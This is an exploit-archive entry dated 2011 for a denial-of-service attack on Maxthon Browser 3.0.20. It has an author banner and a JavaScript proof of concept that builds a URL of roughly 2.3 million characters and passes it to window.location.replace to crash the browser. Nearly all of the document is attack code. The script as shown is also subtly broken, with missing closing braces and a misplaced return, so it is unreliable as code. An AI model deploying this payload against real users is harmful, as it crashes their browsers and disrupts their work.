# Exploit Title: Maxthon Browser v3.0.20.1000 .ref .replace DOS
# Date: January 30 2011
# Author: Carlos Mario Penagos Hollmann
# Software Link: http://dl.maxthon.com/mx3/mx3.0.20.3000.exe
# Version: v3.0.20.1000
# Tested on: Windows xp sp3 ,windows 7 ,linux running on VMware Fusion 3.1 and VirtualBox 3.2.8
#mail----> shogilord^gmail.com spams are welcome!!!!!
#__________________ ____ __ _____ ________
# / ____/ / | |/ / ____/ | / / //_//_/ | / / ____/
#/ __/ / /| | / / __/ /|/ / ,< / //|/ / / __
# / /___/ /___| |/ / /___/ /|/ /| |_/ // /|/ /_/ /
#/_____/_____/|___/_____/_/ |_/_/ |_/___/_/ |_/\____/
# COLOMBIA hacking presents.............
# MAxthon Check the .replace and .ref ;)
<script type="text/javascript">
function mul(str,count){
if(count==0) return '';
var binaryCount = count.toString(2);
var numDegree = binaryCount.length;
var resultStr='';
for(var i=0; i<numDegree; i++){
if(binaryCount.charAt(i) == '1'){
return resultStr;
var junka = "a";
var junk = mul(junka,2304453);
//window.location.href = "http://" + junk;
window.location.replace("http://" + junk);